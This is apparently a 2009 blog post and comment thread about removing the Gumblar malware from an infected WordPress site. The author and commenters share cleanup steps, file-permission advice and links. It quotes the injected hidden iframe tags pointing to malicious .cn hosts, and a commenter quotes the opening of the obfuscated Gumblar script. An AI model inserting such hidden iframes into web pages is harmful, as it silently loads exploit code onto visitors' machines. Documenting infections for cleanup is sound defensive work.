Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.
According to Google Safe Browsing Service
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).This site was hosted on 1 network(s) including AS42831 (UKSERVERS).
I found some of php files were altered by adding a iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.
I manually removed this embedded iframe <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe> and every things works fine.
If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.
Update (5/11/09): I am able to remove this malware from my blog and WordPress admin site.
Removal
- Removed image.php file from all images folder. image.php infection only found in ‘image’ folder. Make sure you didn’t remove the orignal image.php file. If your orignal file infected, only remove malicious code
- Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
- Checked all PHP, HTML and JS files for added anonymous Java Script methods. I found all JS files infected in wp-include directory
- Put httpdoc directory permission to 755
- Scaned my computer with Malwarebytes’ Anti-Malware, which identified several threats and removed
- Updated my AVG Anti Virus
- Changed my FTP password
- I did all this manual code removal activity from my Pleask control panel
Please fell free to make comment and your suggestions to make more security measures to prevent such threats.
Yes – One of my client as also been infected by this malware. Everytime we remove it, it manages to creep back into the system.
Most professionals are using Avast on your computer and a Secure FTP while uploading and files onto the server.
This is the best information that I have read so far. Perhaps it could be useful for someone.
http://www.dynamicdrive.com/forums/showthread.php?t=43390&page=3
If there is any more valuable information we could be keen to learn.
Thanks Gaurav for your comments.
I will consider the software that your recommend for secure uploading. After my manual removal, it didn’t happen to inject in my files any more.
I also recommend that hosting providers should upgrade their Linux machine with latest security patches. A Linux machine without a security patches is the most vulnerable.
I found this virus 10 days ago and 4th of my customers got it .
We removed it more than 10 times but the next day amazingly it was on all pages again .
I found the source file .
I each “Images” folder in your site it will copy a php file “image.php” .
Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .
Then remove the scripts .
If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .
Because google may consider your site as a harmful site .
A good news is that .asp files won’t get this virus .
Another thing is that , in cms sites i changes the permissions of template folders !!!
Thanks adel. The same is happening with me. After removing iframe code from my infected pages I found it appears again. The thing you talk about image.php and changing permission of theme folder looks very helpful. Lets see after following this, this malware infection removed permanently or not.
Tahir,
Unfortunately your site is still infected. Both with the iframe from “bigtruckstopseek .cn” (which is actually not the gumblar exploit) and with the real “gumblar” script, which can be fount right before the body tag. It starts with “(function(){var CEz9t=’%’;var fQJ=(‘va.72.20a.3d.22S…“.
Read my article about this exploit. There are many comments with additional information that may help you get rid of this exploit.
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
Enough files that I have found infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell I use fact no. 10 given in your blog. And I am also able to remove iframe for bigtruckstopseek.cn/ts/in.cgi?banner2. Your blog is very helpful.
Hi Guys,
I had the same issue, after cleaning the file it came back again. The problem seems to be you might have given global access to the folder. When I removed the access and gave read only and write access to admin, the problem was solved.
Guys check and let me know if it works.
Regards,
Lloyd
Lloyd what chmod you are using for your directories. The problem for me is if I remove write and executable access from ‘Other’ group, by blog appears in blank page. So I am thinking what chmod will suit my situation. Any idea…
Here you will find “Permission Scheme for WordPress”
http://codex.wordpress.org/Changing_File_Permissions
Here is another good article to read:
http://codex.wordpress.org/Hardening_WordPress
@Tahir Akram: I’d say start with chmod 755. That will prevent anyone except for the owner from having write access.
Thanks Denis, ST, Gaurav, adel & Lloyd for your comments and support to remove this threat.
I am successfully removed this threat from my blog and wordpress admin. And I pretty much followed what you said. I have updated the post with my course of actions. Please feel free to make comment.
Again thanks.
Hello
now is a few days when i open my site my Persian.be antivirus gives that Application firefox contains to web page gumblar .cn/rrs/?id=, uses to steal password, credit card numbers or other confidential data. Denied.
what can i do to fix it?
Amir you need to follow the steps given in this post and by Denis (comments no. 5).
I want to getrid of gumblar.cn problem so, could u plz help me.
HI, All
i want this gumblar problem will not come again. plz help me?
Hi Gagan;
Did you follow the steps given in this post and discussion. I hope you will get rid of it. As I did. Just do start it.
we are found a script. please help me how to protect our site from gumblar.cn infection
Naresh, Please share your findings here to let us know what remedy steps you required.
Don’t forget the error documents of your website, even if they reside outside of the httpdocs tree.
Access was gained via FTP, so please check where your FTP login has access (i.e httpdocs, httsdocs, cgi-bin, errordocs, …)
Next, CHECK YOUR COMPUTER, for you will have been infected. http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/